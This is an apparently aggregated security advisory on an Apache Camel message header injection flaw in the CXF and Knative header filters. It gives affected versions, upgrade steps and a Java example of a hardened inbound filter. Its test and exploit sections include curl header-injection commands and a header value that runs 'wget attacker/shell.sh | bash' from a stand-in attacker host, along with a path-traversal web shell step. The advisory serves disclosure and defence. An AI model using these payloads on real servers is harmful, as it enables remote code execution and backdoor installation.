Apache Camel, Message Header Injection, CVE-2026-47323 (Critical) -DC-Jun2026-215


The vulnerability stems from incomplete header filtering in three Apache Camel components: `CxfRsHeaderFilterStrategy` (camel-cxf-rest), `CxfHeaderFilterStrategy` (camel-cxf-transport), and `KnativeHttpHeaderFilterStrategy` (camel-knative-http). These strategies filter outbound Camel-internal headers via `setOutFilterStartsWith`, but they never configure inbound filtering via `setInFilterStartsWith`. As a result, an unauthenticated attacker can inject Camel control headers (e.g., `CamelExecCommandExecutable`, `CamelFileName`) through HTTP requests to CXF-RS (REST) or CXF-SOAP endpoints.

When a Camel route forwards such a message to a header-driven component like `camel-exec` or `camel-file`, the injected headers override the legitimate configuration values. For instance, an attacker can set `CamelExecCommandExecutable` to a malicious command, and if the route later invokes an exec component, that command executes on the server. Similarly, `CamelFileName` can point to an arbitrary path, leading to a file write or overwrite. The pattern mirrors previous issues in camel-undertow (CVE-2025-30177), the broader incoming-header filters (CVE-2025-27636, CVE-2025-29891), and non-HTTP strategies (CVE-2026-40453).

Affected versions: Apache Camel from 3.18.0 to before 4.14.6, and from 4.15.0 to before 4.18.2. The fix introduces proper inbound filtering, blocking any header whose name starts with `Camel` from untrusted HTTP inputs. Users on the 4.18.x LTS must upgrade to 4.18.2; those on the 4.14.x LTS to 4.14.6; all others should move to 4.19.0. Without mitigation, remote code execution or arbitrary file writes become trivial.

DailyCVE Form:

Platform: Apache Camel
Version: 3.18.0 to 4.18.2
Vulnerability: Message header injection
Severity: Critical
Date: 2026-05-19

Prediction: Fixed in 4.19.0

What Undercode Say:

```bash
# Check Camel version from Maven pom.xml or running instance
grep -E 'camel-version|org.apache.camel' pom.xml

# Test header injection against a vulnerable CXF endpoint
curl -H "CamelExecCommandExecutable: touch /tmp/pwned" \
     -H "CamelFileName: ../../../etc/passwd" \
     http://target:8080/cxf/orders

# Monitor Camel route logs for unexpected header propagation
grep "Inbound header.Camel" /var/log/camel/application.log

# Enumerate all Camel-internal headers (non-exhaustive)
curl -H "CamelFileName: test" -H "CamelExecCommandExecutable: id" \
     -H "CamelHttpPath: /evil" -H "CamelSqlQuery: DROP TABLE" \
     http://target:8080/cxf/test
```

Exploit:

  1. Identify a publicly exposed CXF-RS or CXF-SOAP endpoint.
  2. Craft an HTTP request adding one or more `Camel` headers (e.g., CamelExecCommandExecutable: /bin/sh -c "wget attacker/shell.sh | bash").
  3. If the route uses `camel-exec` or `camel-file` after the CXF consumer, the injected header triggers RCE or arbitrary file write.
  4. For file write, set `CamelFileName: ../../webapps/ROOT/shell.jsp` and send a body containing a web shell.

Protection:

  • Upgrade to Camel 4.19.0, 4.18.2, or 4.14.6 immediately.
  • If patching is impossible, manually override `inFilterStartsWith` in custom `HeaderFilterStrategy` to block any header starting with “Camel”.
  • Deploy a WAF rule that rejects HTTP requests containing `Camel[A-Z]` in header names.
  • Review all routes that forward CXF/Knative input to exec, file, sql, or script components.
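The `inFilterStartsWith` override recommended above, written out as an added example that is not part of this advisory or of Camel's own code. It assumes Camel 4 (`org.apache.camel.support.DefaultHeaderFilterStrategy` and `camel-main`); the bean name `camelHeaderGuard`, the endpoint URI, the `com.example.OrdersResource` resource class and the spool directory are placeholders for this example. The route also pins the control header it relies on (`CamelFileName`) to a route-owned value, so a downstream `file:` producer never takes its target from whatever arrived on the wire.

```java
// Added example (not from the advisory or the Camel project): a hardened
// HeaderFilterStrategy that supplies the missing inbound filter, registered on a
// CXF-RS consumer. Names marked as placeholders are assumptions for this example.
import org.apache.camel.Exchange;
import org.apache.camel.builder.RouteBuilder;
import org.apache.camel.main.Main;
import org.apache.camel.support.DefaultHeaderFilterStrategy;

public class CamelHeaderGuard extends DefaultHeaderFilterStrategy {

    // Prefixes used by Camel-internal headers. Applying them in both directions
    // means an untrusted HTTP header such as "CamelExecCommandExecutable" is
    // dropped before it becomes a Camel message header, and internal headers
    // are not leaked back to the HTTP client either.
    private static final String[] INTERNAL_PREFIXES = { "Camel", "camel", "org.apache.camel." };

    public CamelHeaderGuard() {
        // Outbound filter: the half the vulnerable strategies already had.
        setOutFilterStartsWith(INTERNAL_PREFIXES);
        // Inbound filter: the half the advisory says was missing.
        setInFilterStartsWith(INTERNAL_PREFIXES);
    }

    public static void main(String[] args) throws Exception {
        Main main = new Main();
        // Bind the strategy so endpoint URIs can reference it as #camelHeaderGuard
        main.bind("camelHeaderGuard", new CamelHeaderGuard());
        main.configure().addRoutesBuilder(new RouteBuilder() {
            @Override
            public void configure() {
                // Placeholder consumer: the resource class and address are illustrative.
                from("cxfrs:http://0.0.0.0:8080/cxf/orders"
                        + "?resourceClasses=com.example.OrdersResource"
                        + "&headerFilterStrategy=#camelHeaderGuard")
                    // Defence in depth: the file producer reads CamelFileName, so set it
                    // from a route-owned expression rather than trusting the message.
                    .setHeader(Exchange.FILE_NAME, simple("order-${exchangeId}.json"))
                    .to("file:/var/spool/orders"); // placeholder target directory
            }
        });
        main.run();
    }
}
```

The same `headerFilterStrategy=#camelHeaderGuard` option applies to the `cxf` (SOAP) endpoint, and the pinning pattern applies equally to `exec:` routes, where `CamelExecCommandExecutable` and `CamelExecCommandArgs` should be set from constants in the route rather than left to inbound data.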

Impact:

  • Remote code execution: attacker can run arbitrary OS commands on the Camel server.
  • Arbitrary file write: overwrite configuration, deploy backdoors, or poison data.
  • Data exfiltration: combine with other headers (CamelFileName could read sensitive files if a file consumer is triggered).
  • Lateral movement: compromised Camel instance often has access to internal networks and databases.


Sources:

Reported By: github.com